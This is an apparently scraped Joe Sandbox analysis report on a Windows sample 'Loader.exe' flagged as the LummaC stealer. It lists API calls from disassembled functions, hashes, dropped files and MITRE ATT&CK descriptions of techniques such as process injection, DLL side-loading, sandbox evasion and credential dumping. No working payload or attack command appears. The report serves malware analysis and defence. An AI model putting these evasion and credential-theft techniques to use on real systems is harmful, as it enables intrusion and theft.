FreeLibrary.KERNEL32(00000000,?,6D7E61A5,00000000,6D7E3BB2,00000000,00000000,00000001,?,6D7E631E,00000022,FlsSetValue,6D7EEA40,6D7EEA48,00000000), ref: 6D7E6157

Strings

ext-ms-, xrefs: 6D7E6101
api-ms-, xrefs: 6D7E60ED

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 37024fd2e3635ab031c4bd7d6c2a6a89b7eabc9ecaf6aeefd5de5e21e28b6dcb
Instruction ID: 1e31fd9842005c2c00f636ef06e8b75b9e73f48a34c9a1db4689ab81ed101554
Opcode Fuzzy Hash: 37024fd2e3635ab031c4bd7d6c2a6a89b7eabc9ecaf6aeefd5de5e21e28b6dcb
Instruction Fuzzy Hash: 0821A136A41212ABDB129B249D44B5E7B79AB463F4F520931EA15E7281D730EA04C6D3

Function 6D7E140E Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6D7E0FD4,6D7DE422,6D7DE719,?,6D7DE951,?,00000001,?,?,00000001,?,6D7F24B8,0000000C,6D7DEA4A), ref: 6D7E141C
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D7E142A
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D7E1443
SetLastError.KERNEL32(00000000,6D7DE951,?,00000001,?,?,00000001,?,6D7F24B8,0000000C,6D7DEA4A,?,00000001,?), ref: 6D7E1495

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9d037c28278b79618a802c57b2c8f3293a405da6678af16f1e2e333456d6ffc0
Instruction ID: 418475c3f0b20d3b63673b8eb96349b7ce71c6069002ba9e968f994a6a2a921c
Opcode Fuzzy Hash: 9d037c28278b79618a802c57b2c8f3293a405da6678af16f1e2e333456d6ffc0
Instruction Fuzzy Hash: A901883220D3265DAB151BB96E4FBA62B74EB076F9721033AFE28552D4EF114841D2D3

Function 6D7E3364 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5073EDC3,00000000,?,00000000,6D7EBA62,000000FF,?,6D7E32FE,?,?,6D7E32D2,?), ref: 6D7E3399
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D7E33AB
FreeLibrary.KERNEL32(00000000,?,00000000,6D7EBA62,000000FF,?,6D7E32FE,?,?,6D7E32D2,?), ref: 6D7E33CD

Strings

CorExitProcess, xrefs: 6D7E33A3
mscoree.dll, xrefs: 6D7E3392

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 057ce24f0f5169abceaf867a663f218c80af472811312b12aa9e55e88360fc87
Instruction ID: 44155cbfe77e0246755f15ed91545e7b6fbe7dbedb7c2cdd1ff8c902889fb526
Opcode Fuzzy Hash: 057ce24f0f5169abceaf867a663f218c80af472811312b12aa9e55e88360fc87
Instruction Fuzzy Hash: 69016276900655EFDF029B50CD05FBEFBB8FB45766F004636E821A22A0DB749900CA91

Function 6D7E22FE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 6D7E2323
CatchIt.LIBVCRUNTIME ref: 6D7E2409

Strings

RCC, xrefs: 6D7E233D
MOC, xrefs: 6D7E2335

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 6bd249845affe9813d299dbe4a01777ff52b0f6ba3d965aa0e1329c5b1d36b95
Instruction ID: 66de248320a1bd6e21768b2bf5902085edd77100836486aad46ae1eb336af3d2
Opcode Fuzzy Hash: 6bd249845affe9813d299dbe4a01777ff52b0f6ba3d965aa0e1329c5b1d36b95
Instruction Fuzzy Hash: 7A418B3290020EAFCF16CF94CE81AEE7BB5BF09364F15816AFA0467211D3319950DF52

Function 6D7E1797 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D7E1748,00000000,?,00000001,?,?,?,6D7E1837,00000001,FlsFree,6D7EDC78,FlsFree), ref: 6D7E17A4
GetLastError.KERNEL32(?,6D7E1748,00000000,?,00000001,?,?,?,6D7E1837,00000001,FlsFree,6D7EDC78,FlsFree,00000000,?,6D7E14E3), ref: 6D7E17AE
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D7E17D6

Strings

api-ms-, xrefs: 6D7E17BB

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: b017a860552c3f494fd5077b7110b5956348897f4b4f9f5485ac6772489a978f
Instruction ID: 2be3f6469fb92e01997d42f6b1fe2266cf5bd65f8e26206d6dd40e9cf517742b
Opcode Fuzzy Hash: b017a860552c3f494fd5077b7110b5956348897f4b4f9f5485ac6772489a978f
Instruction Fuzzy Hash: 12E04F3078420DBBEF011B61DE06B283F75AB01BE9F508431FE0DE84E0DB61D6109587

Function 6D7E85A1 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(5073EDC3,00000000,00000000,?), ref: 6D7E8604

Part of subcall function 6D7E5E98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D7E803F,?,00000000,-00000008), ref: 6D7E5EF9

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6D7E8856
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D7E889C
GetLastError.KERNEL32 ref: 6D7E893F

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 35ee73db90e3967cb92e8211cbb7ef2c10116118584cac3b1e5c1c29baaaf1e8
Instruction ID: 748ab479ec5f492ca988b0904437dde1aacbd267914af5939dde495398e1035b
Opcode Fuzzy Hash: 35ee73db90e3967cb92e8211cbb7ef2c10116118584cac3b1e5c1c29baaaf1e8
Instruction Fuzzy Hash: D7D18A75D04258AFCF01CFE8C984AADBBB4FF49364F18452AE925EB341D730A941CB92

Function 6D7E1D02 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6D7E1DC9
___AdjustPointer.LIBCMT ref: 6D7E1DEC
___AdjustPointer.LIBCMT ref: 6D7E1E88

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 5fe7cab16bf41ab0fc231d7c49163e318783ea5e9db8de5c78aa0e13674ce9b5
Instruction ID: 1f2d4f1a1cbe507598e65c94200de84843a525f326a84d1524aaeaef8a7c8ce2
Opcode Fuzzy Hash: 5fe7cab16bf41ab0fc231d7c49163e318783ea5e9db8de5c78aa0e13674ce9b5
Instruction Fuzzy Hash: 4651F372A04602AFEB26CF54CA42BBA73B4FF447B5F11452EED1597290E731E880C792

Function 6D7E4AE4 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6D7E5E98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D7E803F,?,00000000,-00000008), ref: 6D7E5EF9

GetLastError.KERNEL32 ref: 6D7E4B48
__dosmaperr.LIBCMT ref: 6D7E4B4F
GetLastError.KERNEL32(?,?,?,?), ref: 6D7E4B89
__dosmaperr.LIBCMT ref: 6D7E4B90

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 5c3c6518a1f4a657b7dcbf0e1b29a0f0a270b1cd36964fcb85fd29bc2fc04f53
Instruction ID: 86ccef04a04f6948614bd554f47cd55666482540cd6a097009325fa2f959fb2e
Opcode Fuzzy Hash: 5c3c6518a1f4a657b7dcbf0e1b29a0f0a270b1cd36964fcb85fd29bc2fc04f53
Instruction Fuzzy Hash: 0C21C57260820AAF9B118F65DA44E2BB7BDFF483FC7018529E919D7250D730ED00A792

Function 6D7E9CA6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6D7E9465,00000000,00000001,00000000,?,?,6D7E8993,?,00000000,00000000), ref: 6D7E9CBD
GetLastError.KERNEL32(?,6D7E9465,00000000,00000001,00000000,?,?,6D7E8993,?,00000000,00000000,?,?,?,6D7E8F36,00000000), ref: 6D7E9CC9

Part of subcall function 6D7E9C8F: CloseHandle.KERNEL32(FFFFFFFE,6D7E9CD9,?,6D7E9465,00000000,00000001,00000000,?,?,6D7E8993,?,00000000,00000000,?,?), ref: 6D7E9C9F

___initconout.LIBCMT ref: 6D7E9CD9

Part of subcall function 6D7E9C51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D7E9C80,6D7E9452,?,?,6D7E8993,?,00000000,00000000,?), ref: 6D7E9C64

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6D7E9465,00000000,00000001,00000000,?,?,6D7E8993,?,00000000,00000000,?), ref: 6D7E9CEE

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 25534981f1d9c4306afd90b15f0d2b59fb12965e58b29a261449d7dd3a753285
Instruction ID: 7ccc92ad96afd488e206feec0cb7117131cb2053e68158b9b95312bf4b604086
Opcode Fuzzy Hash: 25534981f1d9c4306afd90b15f0d2b59fb12965e58b29a261449d7dd3a753285
Instruction Fuzzy Hash: 61F01C37001219BBCF122FA1CD09A9A7FB6FB093B5B454022FA1D85120D772D8A0EBD2

Function 6D7E8E54 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D7E85A1: GetConsoleOutputCP.KERNEL32(5073EDC3,00000000,00000000,?), ref: 6D7E8604

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6D7E6CEB,?), ref: 6D7E8FD9
GetLastError.KERNEL32(?,6D7E6CEB,?,~k~m,00000000,?,00000000,6D7E6B7E,?,00000000,00000000,6D7F2958,0000002C,6D7E6BEF,?), ref: 6D7E8FE3

Strings

l~m, xrefs: 6D7E8F5B, 6D7E9004

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID: l~m
API String ID: 2915228174-3895294639
Opcode ID: 4c61b42a7fc4fdc6611ec2a4ae907301e781c9636dacb4ac7d7e1de36fd8b6b1
Instruction ID: edfe6b5ccf59b5bf38268c2b8bb32d4cdbc233ee6c7ee34d5fe4ce0024b03946
Opcode Fuzzy Hash: 4c61b42a7fc4fdc6611ec2a4ae907301e781c9636dacb4ac7d7e1de36fd8b6b1
Instruction Fuzzy Hash: 1561B971D1411AAFDF01CFA8CE44AEEBFB9BF49364F44455AE910A7241D331D901CBA2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Loader.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Loader.exe.log

C:\Users\user\AppData\Roaming\msvcp110.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
Loader.exe

Function 6D7C0A10 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 360
COMMON

Function 6D7DE848 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6D7DE8F8 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6D7E5F3B Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Function 6D7DE741 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6D7E6E64 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre